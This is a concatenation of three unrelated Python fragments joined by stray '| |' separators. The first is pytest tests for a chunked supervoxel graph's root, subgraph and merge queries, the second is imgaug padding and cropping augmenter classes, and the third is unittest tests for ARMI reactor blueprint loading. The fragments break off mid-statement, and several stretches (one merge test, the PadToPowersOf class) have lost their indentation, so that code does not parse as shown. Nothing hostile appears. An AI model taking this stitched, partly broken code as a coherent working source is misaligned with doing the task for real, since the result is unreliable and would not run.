    root12000 = cgraph.get_root(to_label(cgraph, 1, 2, 0, 0, 0),
                                time_stamp=None)
    # node ID 0 is not a valid label
    with pytest.raises(Exception) as e:
        cgraph.get_root(0)
    # accept both assignments of the two root IDs to the two components
    assert (root10000 == to_label(cgraph, 4, 0, 0, 0, 1) and
            root11000 == root11001 == root12000 == to_label(
                cgraph, 4, 0, 0, 0, 2)) or \
           (root10000 == to_label(cgraph, 4, 0, 0, 0, 2) and
            root11000 == root11001 == root12000 == to_label(
                cgraph, 4, 0, 0, 0, 1))
@pytest.mark.timeout(30)
def test_get_subgraph_nodes(self, gen_graph_simplequerytest):
    """Query the subgraph nodes of both roots at every layer, with a
    multi-layer request, with a bounding box, and from a mid-level node."""
    cgraph = gen_graph_simplequerytest
    root1 = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))
    root2 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
    # layer 1 (supervoxels): root1 owns one sv, root2 owns three
    lvl1_nodes_1 = cgraph.get_subgraph_nodes(root1)
    lvl1_nodes_2 = cgraph.get_subgraph_nodes(root2)
    assert len(lvl1_nodes_1) == 1
    assert len(lvl1_nodes_2) == 3
    assert to_label(cgraph, 1, 0, 0, 0, 0) in lvl1_nodes_1
    assert to_label(cgraph, 1, 1, 0, 0, 0) in lvl1_nodes_2
    assert to_label(cgraph, 1, 1, 0, 0, 1) in lvl1_nodes_2
    assert to_label(cgraph, 1, 2, 0, 0, 0) in lvl1_nodes_2
    # layer 2 parents
    lvl2_nodes_1 = cgraph.get_subgraph_nodes(root1, return_layers=[2])
    lvl2_nodes_2 = cgraph.get_subgraph_nodes(root2, return_layers=[2])
    assert len(lvl2_nodes_1) == 1
    assert len(lvl2_nodes_2) == 2
    assert to_label(cgraph, 2, 0, 0, 0, 1) in lvl2_nodes_1
    assert to_label(cgraph, 2, 1, 0, 0, 1) in lvl2_nodes_2
    assert to_label(cgraph, 2, 2, 0, 0, 1) in lvl2_nodes_2
    # layer 3 parents
    lvl3_nodes_1 = cgraph.get_subgraph_nodes(root1, return_layers=[3])
    lvl3_nodes_2 = cgraph.get_subgraph_nodes(root2, return_layers=[3])
    assert len(lvl3_nodes_1) == 1
    assert len(lvl3_nodes_2) == 2
    assert to_label(cgraph, 3, 0, 0, 0, 1) in lvl3_nodes_1
    assert to_label(cgraph, 3, 0, 0, 0, 2) in lvl3_nodes_2
    assert to_label(cgraph, 3, 1, 0, 0, 1) in lvl3_nodes_2
    # layer 4 (root layer) returns the root itself
    lvl4_node = cgraph.get_subgraph_nodes(root1, return_layers=[4])
    assert len(lvl4_node) == 1
    assert root1 in lvl4_node
    # requesting multiple layers returns a dict keyed by layer
    layers = cgraph.get_subgraph_nodes(root2, return_layers=[1, 4])
    assert len(layers) == 2 and 1 in layers and 4 in layers
    assert len(layers[4]) == 1 and root2 in layers[4]
    assert len(layers[1]) == 3
    assert to_label(cgraph, 1, 1, 0, 0, 0) in layers[1]
    assert to_label(cgraph, 1, 1, 0, 0, 1) in layers[1]
    assert to_label(cgraph, 1, 2, 0, 0, 0) in layers[1]
    # a bounding box in chunk coordinates restricts the result
    lvl2_nodes = cgraph.get_subgraph_nodes(root2, return_layers=[2],
                                           bounding_box=[[1, 0, 0], [2, 1, 1]],
                                           bb_is_coordinate=False)
    assert len(lvl2_nodes) == 1
    assert to_label(cgraph, 2, 1, 0, 0, 1) in lvl2_nodes
    # querying from a mid-level node returns only its own children
    lvl2_parent = cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0))
    lvl1_nodes = cgraph.get_subgraph_nodes(lvl2_parent)
    assert len(lvl1_nodes) == 2
    assert to_label(cgraph, 1, 1, 0, 0, 0) in lvl1_nodes
    assert to_label(cgraph, 1, 1, 0, 0, 1) in lvl1_nodes
@pytest.mark.timeout(30)
def test_get_subgraph_edges(self, gen_graph_simplequerytest):
    """Edges of the isolated component must be empty; edges of the
    connected component must contain both atomic edges (orientation of
    each pair is unspecified, so both orders are accepted)."""
    cgraph = gen_graph_simplequerytest
    root1 = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))
    root2 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
    # isolated supervoxel: no edges, affinities, or areas
    edges, affinities, areas = cgraph.get_subgraph_edges(root1)
    assert len(edges) == 0 and len(affinities) == 0 and len(areas) == 0
    # connected component: expect the (1,1,0,0,0)-(1,1,0,0,1) and
    # (1,1,0,0,0)-(1,2,0,0,0) edges in either orientation
    edges, affinities, areas = cgraph.get_subgraph_edges(root2)
    assert [to_label(cgraph, 1, 1, 0, 0, 0),
            to_label(cgraph, 1, 1, 0, 0, 1)] in edges or \
           [to_label(cgraph, 1, 1, 0, 0, 1),
            to_label(cgraph, 1, 1, 0, 0, 0)] in edges
    assert [to_label(cgraph, 1, 1, 0, 0, 0),
            to_label(cgraph, 1, 2, 0, 0, 0)] in edges or \
           [to_label(cgraph, 1, 2, 0, 0, 0),
            to_label(cgraph, 1, 1, 0, 0, 0)] in edges
    # assert len(edges) == 2 and len(affinities) == 2 and len(areas) == 2
    # querying from a level-2 parent yields the same two edges
    lvl2_parent = cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0))
    edges, affinities, areas = cgraph.get_subgraph_edges(lvl2_parent)
    assert [to_label(cgraph, 1, 1, 0, 0, 0),
            to_label(cgraph, 1, 1, 0, 0, 1)] in edges or \
           [to_label(cgraph, 1, 1, 0, 0, 1),
            to_label(cgraph, 1, 1, 0, 0, 0)] in edges
    assert [to_label(cgraph, 1, 1, 0, 0, 0),
            to_label(cgraph, 1, 2, 0, 0, 0)] in edges or \
           [to_label(cgraph, 1, 2, 0, 0, 0),
            to_label(cgraph, 1, 1, 0, 0, 0)] in edges
    assert len(edges) == 2
@pytest.mark.timeout(30)
def test_get_subgraph_nodes_bb(self, gen_graph_simplequerytest):
    """A bounding box given in chunk coordinates and the equivalent box in
    voxel coordinates must select the same subgraph nodes."""
    cgraph = gen_graph_simplequerytest
    # np.int was removed in NumPy 1.24; builtin int is equivalent here
    bb = np.array([[1, 0, 0], [2, 1, 1]], dtype=int)
    bb_coord = bb * cgraph.chunk_size
    childs_1 = cgraph.get_subgraph_nodes(
        cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1)),
        bounding_box=bb)
    childs_2 = cgraph.get_subgraph_nodes(
        cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1)),
        bounding_box=bb_coord, bb_is_coordinate=True)
    # Bug fix: the old assertion was `np.all(~(childs_1 - childs_2))` on
    # sorted arrays; `~` is *bitwise* NOT, so ~0 == -1 (truthy) and the
    # assert only failed when an elementwise difference was exactly -1 --
    # mismatched results could pass. Compare for equality directly.
    assert len(childs_1) == len(childs_2)
    assert np.all(np.sort(childs_1) == np.sort(childs_2))
@pytest.mark.timeout(30)
def test_get_atomic_partners(self, gen_graph_simplequerytest):
    # NOTE(review): this test only builds the fixture and asserts nothing;
    # it appears to be a stub -- consider adding get_atomic_partners()
    # checks against the known fixture edges.
    cgraph = gen_graph_simplequerytest
class TestGraphMerge:
@pytest.mark.timeout(30)
def test_merge_pair_same_chunk(self, gen_graph):
    """
    Add edge between existing RG supervoxels 1 and 2 (same chunk)
    Expected: Same (new) parent for RG 1 and 2 on Layer two
    ┌─────┐      ┌─────┐
    │ A¹  │      │ A¹  │
    │ 1 2 │  =>  │ 1━2 │
    │     │      │     │
    └─────┘      └─────┘
    """
    cgraph = gen_graph(n_layers=2)
    # Preparation: Build Chunk A with two *unconnected* supervoxels,
    # created in the past so the merge is a clearly later operation
    fake_timestamp = datetime.utcnow() - timedelta(days=10)
    create_chunk(cgraph,
                 vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
                 edges=[],
                 timestamp=fake_timestamp)
    # Merge: adding the edge must produce exactly one new root
    new_root_ids = cgraph.add_edges("<NAME>", [to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
    assert len(new_root_ids) == 1
    new_root_id = new_root_ids[0]
    # Check: both supervoxels share the new parent, each lists the other
    # as atomic partner with the requested affinity, and the subgraph of
    # the new root contains exactly the two leaves
    assert cgraph.get_parent(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
    assert cgraph.get_parent(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_id
    partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
    assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 1) and affinities[0] == np.float32(0.3)
    partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
    assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 0) and affinities[0] == np.float32(0.3)
    leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
    assert len(leaves) == 2
    assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
    assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
@pytest.mark.timeout(30)
def test_merge_pair_neighboring_chunks(self, gen_graph):
    """
    Add edge between existing RG supervoxels 1 and 2 (neighboring chunks)
    ┌─────┬─────┐      ┌─────┬─────┐
    │ A¹  │ B¹  │      │ A¹  │ B¹  │
    │ 1   │ 2   │  =>  │ 1━━┿━━2   │
    │     │     │      │     │     │
    └─────┴─────┘      └─────┴─────┘
    """
    cgraph = gen_graph(n_layers=3)
    # Preparation: Build Chunk A
    fake_timestamp = datetime.utcnow() - timedelta(days=10)
    create_chunk(cgraph,
                 vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
                 edges=[],
                 timestamp=fake_timestamp)
    # Preparation: Build Chunk B
    create_chunk(cgraph,
                 vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
                 edges=[],
                 timestamp=fake_timestamp)
    # build the layer-3 abstraction over both chunks
    cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
    # Merge: cross-chunk edge must still yield exactly one new root
    new_root_ids = cgraph.add_edges("<NAME>", [to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
    assert len(new_root_ids) == 1
    new_root_id = new_root_ids[0]
    # Check: shared root, mutual atomic partners with the given affinity,
    # and exactly the two leaves under the new root
    assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
    assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == new_root_id
    partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
    assert partners[0] == to_label(cgraph, 1, 1, 0, 0, 0) and affinities[0] == np.float32(0.3)
    partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0))
    assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 0) and affinities[0] == np.float32(0.3)
    leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
    assert len(leaves) == 2
    assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
    assert to_label(cgraph, 1, 1, 0, 0, 0) in leaves
@pytest.mark.timeout(30)
def test_merge_pair_disconnected_chunks(self, gen_graph):
"""
Add edge between existing RG supervoxels 1 and 2 (disconnected chunks)
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│ A¹ │ ... │ Z¹ │ │ A¹ │ ... │ Z¹ │
│ 1 │ │ 2 │ => │ 1━━┿━━━━━┿━━2 │
│ │ │ │ │ │ │ │
└─────┘ └─────┘ └─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=9)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk Z
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 127, 127, 127, 0)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x7F, 0x7F, 0x7F]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x3F, 0x3F, 0x3F]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x1F, 0x1F, 0x1F]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x0F, 0x0F, 0x0F]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x07, 0x07, 0x07]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x03, 0x03, 0x03]]), time_stamp=fake_timestamp)
cgraph.add_layer(9, np.array([[0x00, 0x00, 0x00], [0x01, 0x01, 0x01]]), time_stamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("<NAME>", [to_label(cgraph, 1, 127, 127, 127, 0), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 127, 127, 127, 0)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 127, 127, 127, 0) and affinities[0] == np.float32(0.3)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 127, 127, 127, 0))
assert partners[0] == to_label(cgraph, 1, | |
warning,
but it is still recommended to use `seed` now.
Outdated since 0.4.0.
deterministic : bool, optional
Deprecated since 0.4.0.
See method ``to_deterministic()`` for an alternative and for
details about what the "deterministic mode" actually does.
Examples
--------
>>> import imgaug.augmenters as iaa
>>> aug = iaa.CenterPadToMultiplesOf(height_multiple=10, width_multiple=6)
Create an augmenter that pads images to multiples of ``10`` along
the y-axis (i.e. 10, 20, 30, ...) and to multiples of ``6`` along the
x-axis (i.e. 6, 12, 18, ...).
The rows to be padded will be spread *equally* over the top and bottom
sides (analogous for the left/right sides).
"""
# Added in 0.4.0.
def __init__(self, width_multiple, height_multiple,
             pad_mode="constant", pad_cval=0,
             seed=None, name=None,
             random_state="deprecated", deterministic="deprecated"):
    # Delegates to the parent padding augmenter with position fixed to
    # "center", so padded rows/columns are spread equally over opposite
    # image sides (see class docstring).
    super(CenterPadToMultiplesOf, self).__init__(
        width_multiple=width_multiple,
        height_multiple=height_multiple,
        pad_mode=pad_mode,
        pad_cval=pad_cval,
        position="center",
        seed=seed, name=name,
        random_state=random_state, deterministic=deterministic)
class CropToPowersOf(CropToFixedSize):
    """Crop images until their height/width is a power of a base.

    For an axis of size ``S``, pixels are removed until the new size
    satisfies ``S' = B^E``, where ``B`` is the configured base (e.g. ``2``)
    and ``E`` is an exponent from the discrete interval ``[1 .. inf)``.

    .. note::

        Axes with size below ``B^1 = B`` are left unaltered. If inputs with
        ``S < B^1`` are possible, it is recommended to combine this
        augmenter with a padding augmenter that pads each axis up to ``B``.

    Added in 0.4.0.

    **Supported dtypes**:

    See :class:`~imgaug.augmenters.size.CropToFixedSize`.

    Parameters
    ----------
    width_base : int or None
        Base for the width. Images are cropped until
        ``width' = width_base ^ E`` for some natural number ``E``.
        ``None`` leaves image widths unaltered.

    height_base : int or None
        Base for the height. Images are cropped until
        ``height' = height_base ^ E`` for some natural number ``E``.
        ``None`` leaves image heights unaltered.

    position : {'uniform', 'normal', 'center', 'left-top', 'left-center', 'left-bottom', 'center-top', 'center-center', 'center-bottom', 'right-top', 'right-center', 'right-bottom'} or tuple of float or StochasticParameter or tuple of StochasticParameter, optional
        See :func:`CropToFixedSize.__init__`.

    seed : None or int or imgaug.random.RNG or numpy.random.Generator or numpy.random.BitGenerator or numpy.random.SeedSequence or numpy.random.RandomState, optional
        See :func:`~imgaug.augmenters.meta.Augmenter.__init__`.

    name : None or str, optional
        See :func:`~imgaug.augmenters.meta.Augmenter.__init__`.

    random_state : None or int or imgaug.random.RNG or numpy.random.Generator or numpy.random.BitGenerator or numpy.random.SeedSequence or numpy.random.RandomState, optional
        Old name for parameter `seed`. Still accepted without a deprecation
        warning, but `seed` is recommended. Outdated since 0.4.0.

    deterministic : bool, optional
        Deprecated since 0.4.0. See ``to_deterministic()`` for an
        alternative and for details about the "deterministic mode".

    Examples
    --------
    >>> import imgaug.augmenters as iaa
    >>> aug = iaa.CropToPowersOf(height_base=3, width_base=2)

    Crop each image down to powers of ``3`` along the y-axis (i.e. 3, 9,
    27, ...) and powers of ``2`` along the x-axis (i.e. 2, 4, 8, 16, ...),
    with the cropped rows/columns spread *randomly* over the opposing
    image sides.
    """

    # Added in 0.4.0.
    def __init__(self, width_base, height_base, position="uniform",
                 seed=None, name=None,
                 random_state="deprecated", deterministic="deprecated"):
        super(CropToPowersOf, self).__init__(
            width=None, height=None, position=position,
            seed=seed, name=name,
            random_state=random_state, deterministic=deterministic)
        self.width_base = width_base
        self.height_base = height_base

    # Added in 0.4.0.
    def _draw_samples(self, batch, random_state):
        _sizes, offset_xs, offset_ys = super(
            CropToPowersOf, self
        )._draw_samples(batch, random_state)
        sizes = []
        for shape in batch.get_rowwise_shapes():
            height, width = shape[0:2]
            crops = compute_croppings_to_reach_powers_of(
                shape,
                height_base=self.height_base,
                width_base=self.width_base)
            # TODO change that
            # note: entries are (width, height), i.e. *not* in the same
            # order as the shape tuples in CropToFixedSize
            sizes.append((width - crops[1] - crops[3],
                          height - crops[0] - crops[2]))
        return sizes, offset_xs, offset_ys

    # Added in 0.4.0.
    def get_parameters(self):
        """See :func:`~imgaug.augmenters.meta.Augmenter.get_parameters`."""
        return [self.width_base, self.height_base, self.position]
class CenterCropToPowersOf(CropToPowersOf):
    """Crop images equally on all sides until H/W is a power of a base.

    This is the same as :class:`~imgaug.augmenters.size.CropToPowersOf`, but
    uses ``position="center"`` by default, which spreads the crop amounts
    equally over all image sides, while
    :class:`~imgaug.augmenters.size.CropToPowersOf` by default spreads them
    randomly.

    Added in 0.4.0.

    **Supported dtypes**:

    See :class:`~imgaug.augmenters.size.CropToFixedSize`.

    Parameters
    ----------
    width_base : int or None
        See :func:`CropToPowersOf.__init__`.

    height_base : int or None
        See :func:`CropToPowersOf.__init__`.

    seed : None or int or imgaug.random.RNG or numpy.random.Generator or numpy.random.BitGenerator or numpy.random.SeedSequence or numpy.random.RandomState, optional
        See :func:`~imgaug.augmenters.meta.Augmenter.__init__`.

    name : None or str, optional
        See :func:`~imgaug.augmenters.meta.Augmenter.__init__`.

    random_state : None or int or imgaug.random.RNG or numpy.random.Generator or numpy.random.BitGenerator or numpy.random.SeedSequence or numpy.random.RandomState, optional
        Old name for parameter `seed`.
        Its usage will not yet cause a deprecation warning,
        but it is still recommended to use `seed` now.
        Outdated since 0.4.0.

    deterministic : bool, optional
        Deprecated since 0.4.0.
        See method ``to_deterministic()`` for an alternative and for
        details about what the "deterministic mode" actually does.

    Examples
    --------
    >>> import imgaug.augmenters as iaa
    >>> aug = iaa.CenterCropToPowersOf(height_base=3, width_base=2)

    Create an augmenter that crops each image down to powers of ``3`` along
    the y-axis (i.e. 3, 9, 27, ...) and powers of ``2`` along the x-axis (i.e.
    2, 4, 8, 16, ...).
    The rows to be cropped will be spread *equally* over the top and bottom
    sides (analogous for the left/right sides).
    """

    # Added in 0.4.0.
    def __init__(self, width_base, height_base,
                 seed=None, name=None,
                 random_state="deprecated", deterministic="deprecated"):
        super(CenterCropToPowersOf, self).__init__(
            width_base=width_base, height_base=height_base, position="center",
            seed=seed, name=name,
            random_state=random_state, deterministic=deterministic)
class PadToPowersOf(PadToFixedSize):
"""Pad images until their height/width is a power of a base.
This augmenter adds pixels to an axis with size ``S`` leading to the
new size ``S'`` until ``S' = B^E`` is fulfilled, where ``B`` is a
provided base (e.g. ``2``) and ``E`` is an exponent from the discrete
interval ``[1 .. inf)``.
Added in 0.4.0.
**Supported dtypes**:
See :class:`~imgaug.augmenters.size.PadToFixedSize`.
Parameters
----------
width_base : int or None
Base for the width. Images will be padded down until their
width fulfills ``width' = width_base ^ E`` with ``E`` being any
natural number.
If ``None``, image widths will not be altered.
height_base : int or None
Base for the height. Images will be padded until their
height fulfills ``height' = height_base ^ E`` with ``E`` being any
natural number.
If ``None``, image heights will not be altered.
pad_mode : imgaug.ALL or str or list of str or imgaug.parameters.StochasticParameter, optional
See :func:`~imgaug.augmenters.size.PadToFixedSize.__init__`.
pad_cval : number or tuple of number or list of number or imgaug.parameters.StochasticParameter, optional
See :func:`~imgaug.augmenters.size.PadToFixedSize.__init__`.
position : {'uniform', 'normal', 'center', 'left-top', 'left-center', 'left-bottom', 'center-top', 'center-center', 'center-bottom', 'right-top', 'right-center', 'right-bottom'} or tuple of float or StochasticParameter or tuple of StochasticParameter, optional
See :func:`PadToFixedSize.__init__`.
seed : None or int or imgaug.random.RNG or numpy.random.Generator or numpy.random.BitGenerator or numpy.random.SeedSequence or numpy.random.RandomState, optional
See :func:`~imgaug.augmenters.meta.Augmenter.__init__`.
name : None or str, optional
See :func:`~imgaug.augmenters.meta.Augmenter.__init__`.
random_state : None or int or imgaug.random.RNG or numpy.random.Generator or numpy.random.BitGenerator or numpy.random.SeedSequence or numpy.random.RandomState, optional
Old name for parameter `seed`.
Its usage will not yet cause a deprecation warning,
but it is still recommended to use `seed` now.
Outdated since 0.4.0.
deterministic : bool, optional
Deprecated since 0.4.0.
See method ``to_deterministic()`` for an alternative and for
details about what the "deterministic mode" actually does.
Examples
--------
>>> import imgaug.augmenters as iaa
>>> aug = iaa.PadToPowersOf(height_base=3, width_base=2)
Create an augmenter that pads each image to powers of ``3`` along the
y-axis (i.e. 3, 9, 27, ...) and powers of ``2`` along the x-axis (i.e. 2,
4, 8, 16, ...).
The rows to be padded will be spread *randomly* over the top and bottom
sides (analogous for the left/right sides).
"""
# Added in 0.4.0.
def __init__(self, width_base, height_base,
             pad_mode="constant", pad_cval=0,
             position="uniform",
             seed=None, name=None,
             random_state="deprecated", deterministic="deprecated"):
    # PadToFixedSize is initialized with width=None/height=None; the
    # actual per-image target sizes are derived later in _draw_samples()
    # from width_base/height_base.
    super(PadToPowersOf, self).__init__(
        width=None, height=None, pad_mode=pad_mode, pad_cval=pad_cval,
        position=position,
        seed=seed, name=name,
        random_state=random_state, deterministic=deterministic)
    self.width_base = width_base
    self.height_base = height_base
# Added in 0.4.0.
def _draw_samples(self, batch, random_state):
_sizes, pad_xs, pad_ys, pad_modes, pad_cvals = super(
PadToPowersOf, self
)._draw_samples(batch, random_state)
shapes = batch.get_rowwise_shapes()
sizes = []
for shape in shapes:
height, width = shape[0:2]
paddings = compute_paddings_to_reach_powers_of(
shape,
height_base=self.height_base,
width_base=self.width_base)
# TODO change that
# note that these are not in the same | |
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests the blueprints (loading input) file"""
import os
import pathlib
import unittest
import yamlize
from armi.reactor import blueprints
from armi.reactor import parameters
from armi.reactor.flags import Flags
from armi.nucDirectory.elements import bySymbol
from armi import settings
from armi.tests import TEST_ROOT
from armi.utils import directoryChangers
from armi.utils import textProcessors
from armi.reactor.blueprints.isotopicOptions import NuclideFlags, CustomIsotopics
from armi.reactor.blueprints.componentBlueprint import ComponentBlueprint
class TestBlueprints(unittest.TestCase):
    """Test that the basic functionality of faithfully receiving user input to construct
    ARMI data model objects works as expected.

    Values are hopefully not hardcoded in here, just sanity checks that nothing messed
    up, as this code has VERY high incidental coverage from other tests.

    NOTE: as it stands it seems a little hard to test more granularity with the
    blueprints file as each initialization is intended to be a complete load from the
    input file, and each load also makes calls out to the reactor for some assembly
    initialization steps.

    TODO: see the above note, and try to test blueprints on a wider range of input
    files, touching on each failure case.
    """

    @classmethod
    def setUpClass(cls):
        # Load the blueprints once for the whole class; the tests below are
        # read-only and construction is comparatively expensive.
        cls.cs = settings.Settings()
        cls.directoryChanger = directoryChangers.DirectoryChanger(TEST_ROOT)
        cls.directoryChanger.open()
        # Resolve include-style markup before handing the YAML to the loader.
        y = textProcessors.resolveMarkupInclusions(
            pathlib.Path(os.getcwd()) / "refSmallReactor.yaml"
        )
        cls.blueprints = blueprints.Blueprints.load(y)
        cls.blueprints._prepConstruction(cls.cs)

    @classmethod
    def tearDownClass(cls):
        # Undo the working-directory change made in setUpClass.
        cls.directoryChanger.close()

    def test_nuclides(self):
        """Tests the available sets of nuclides work as expected"""
        actives = set(self.blueprints.activeNuclides)
        inerts = set(self.blueprints.inertNuclides)
        # Active and inert nuclides must exactly partition the problem set.
        self.assertEqual(
            actives.union(inerts), set(self.blueprints.allNuclidesInProblem)
        )
        self.assertEqual(actives.intersection(inerts), set())

    def test_getAssemblyTypeBySpecifier(self):
        # Lookup by two-letter specifier must return the matching design.
        aDesign = self.blueprints.assemDesigns.bySpecifier["IC"]
        self.assertEqual(aDesign.name, "igniter fuel")
        self.assertEqual(aDesign.specifier, "IC")

    def test_specialIsotopicVectors(self):
        mox = self.blueprints.customIsotopics["MOX"]
        allNucsInProblem = set(self.blueprints.allNuclidesInProblem)
        # Every nuclide of the custom vector must be tracked in the problem.
        for a in mox.keys():
            self.assertIn(a, allNucsInProblem)
        self.assertIn("U235", mox)
        self.assertAlmostEqual(mox["PU239"], 0.00286038)

    def test_componentDimensions(self):
        fuelAssem = self.blueprints.constructAssem(self.cs, name="igniter fuel")
        fuel = fuelAssem.getComponents(Flags.FUEL)[0]
        # Cold (as-input) dimensions vs. hot (thermally expanded) dimensions.
        self.assertAlmostEqual(fuel.getDimension("od", cold=True), 0.86602)
        self.assertAlmostEqual(fuel.getDimension("id", cold=True), 0.0)
        self.assertAlmostEqual(fuel.getDimension("od"), 0.87763665, 4)
        self.assertAlmostEqual(fuel.getDimension("id"), 0.0)
        self.assertAlmostEqual(fuel.getDimension("mult"), 169)

    def test_traceNuclides(self):
        """Ensure that armi.reactor.blueprints.componentBlueprint._insertDepletableNuclideKeys runs."""
        fuel = (
            self.blueprints.constructAssem(self.cs, "igniter fuel")
            .getFirstBlock(Flags.FUEL)
            .getComponent(Flags.FUEL)
        )
        # AM241 is not in the input composition; it should appear as a trace.
        self.assertIn("AM241", fuel.getNuclides())
        self.assertLess(fuel.getNumberDensity("AM241"), 1e-5)
class TestBlueprintsSchema(unittest.TestCase):
    """Test the blueprint schema checks"""

    # Shared YAML fixture: one hex fuel block, a free-standing sphere
    # component, two assemblies ("fuel b" extends "fuel a" through a YAML
    # merge key and sets assembly-level parameters), and a small cartesian
    # pin grid. NOTE(review): indentation reconstructed — verify against VCS.
    yamlString = r"""blocks:
    fuel: &block_fuel
        fuel: &component_fuel_fuel
            shape: Hexagon
            material: UZr
            Tinput: 25.0
            Thot: 600.0
            ip: 0.0
            mult: 1.0
            op: 10.0
components:
    freefuel:
        shape: Sphere
        material: UZr
        Tinput: 25.0
        Thot: 600.0
        id: 0.0
        mult: 1.0
        od: 11.0
assemblies:
    fuel a: &assembly_a
        specifier: IC
        blocks: [*block_fuel]
        height: [1.0]
        axial mesh points: [1]
        xs types: [A]
    fuel b:
        <<: *assembly_a
        fuelVent: True
        hotChannelFactors: Reactor
grids:
    pins:
        geom: cartesian
        lattice map: |
            2 2 2 2 2
            2 1 1 1 2
            2 1 3 1 2
            2 3 1 1 2
            2 2 2 2 2
"""
    def test_assemblyParameters(self):
        """Parameters assigned in blueprints (fuelVent, hotChannelFactors) land on the assembly."""
        cs = settings.Settings()
        design = blueprints.Blueprints.load(self.yamlString)
        fa = design.constructAssem(cs, name="fuel a")
        fb = design.constructAssem(cs, name="fuel b")
        for paramDef in fa.p.paramDefs.inCategory(
            parameters.Category.assignInBlueprints
        ):
            # Semantics of __iter__() and items() is different now in the parameter
            # system. Since we aren't using __slots__ anymore, we use the parameter
            # definitions (which have a global-ish sense of `assigned`ness), so we can't
            # tell, per-object, whether they've been set.
            self.assertEqual(paramDef.default, fa.p[paramDef.name])
            self.assertIn(paramDef.name, fb.p)
        # "fuel a" does not set these parameters, so defaults apply ...
        self.assertFalse(fa.p.fuelVent)
        self.assertEqual(fa.p.hotChannelFactors, "Default")
        # ... while "fuel b" overrides both in the YAML fixture.
        self.assertTrue(fb.p.fuelVent)
        self.assertEqual(fb.p.hotChannelFactors, "Reactor")
    def test_nuclidesMc2v2(self):
        """Tests that ZR is not expanded to its isotopics for the MC2v2 kernel setting."""
        cs = settings.Settings()
        newSettings = {"xsKernel": "MC2v2"}
        cs = cs.modified(newSettings=newSettings)
        design = blueprints.Blueprints.load(self.yamlString)
        design._prepConstruction(cs)
        # Elemental ZR must survive as-is alongside the uranium nuclides.
        self.assertTrue(
            set({"U238", "U235", "ZR"}).issubset(set(design.allNuclidesInProblem))
        )
        assem = design.constructAssem(cs, name="fuel a")
        # Everything on the constructed assembly must be tracked in the problem.
        self.assertTrue(
